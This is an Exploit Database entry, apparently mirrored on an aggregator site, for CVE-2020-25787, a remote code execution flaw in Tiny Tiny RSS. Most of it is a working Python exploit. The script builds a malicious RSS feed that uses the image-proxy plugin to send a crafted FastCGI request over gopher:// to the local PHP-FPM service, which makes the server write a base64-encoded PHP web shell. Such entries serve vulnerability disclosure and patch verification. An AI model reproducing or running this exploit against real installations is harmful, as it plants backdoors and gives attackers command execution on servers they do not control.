Tiny Tiny RSS – Remote Code Execution

• Exploit Database
• 14 阅读

• 作者： Daniel Neagaru
  日期： 2021-03-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49606/

• # Exploit Title: Tiny Tiny RSS - Remote Code Execution
  # Date: 21/09/2020
  # Exploit Author: Daniel Neagaru & Benjamin Nadarević
  # Blog post: https://www.digeex.de/blog/tinytinyrss/
  # Software Link: https://git.tt-rss.org/fox/tt-rss
  # Version: all before 2020-09-16
  # Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
  # Tested on: default docker installation method
  # CVE : CVE-2020-25787
  
  #!/usr/bin/env python3
  
  from sys import argv
  import urllib.parse as ul
  import base64
  
  
  def CustomFcgi( filename, output, backdoor):
  length=len(output)+len(backdoor)+64
  char=chr(length)
  
  data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length)))
  data += "CONTENT_LENGTH" + str(length) +"\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"
  data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/"
  
  temp1 = chr(len(data) // 256)
  temp2 = chr(len(data) % 256)
  temp3 = chr(len(data) % 8)
  
  end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00"
  end += "<?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>\x00\x00\x00\x00"
  start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00"
  
  payload = start + data + end
  def get_payload(payload):
  finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/")
  return finalpayload
  
  return "gopher://localhost:9000/_"+get_payload(get_payload(payload))
  
  
  
  TTRSS_PATH = "/var/www/html/tt-rss/"
  BACKDOOR_CODE = """
  <?php
  echo "success\n";
  echo system($_GET['cmd']);
  ?>
  """
  
  
  feed_file = open("malicious_RCE_feed.xml",'w')
  filename = TTRSS_PATH + "config.php"
  output = TTRSS_PATH + "backdoor.php"
  
  backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii"))
  rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text"
  
  feed ="""<?xml version="1.0" encoding="UTF-8" ?>
  <rss version="2.0">
  
  <channel>
  <title>Exploit demo - rce</title>
  <link></link>
  <description>You are getting infected :(</description>
  <item>
  <title> Check if there is backdoor.php</title>
  <link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link>
  <description>
  <![CDATA[
  Dummy text
  
  <img src="https://www.exploit-db.com/exploits/49606/{}">
  
  ]]>
  </description>
  </item>
  </channel>
  </rss>
  """.format(rce)
  
  feed_file.write(feed)
  feed_file.close()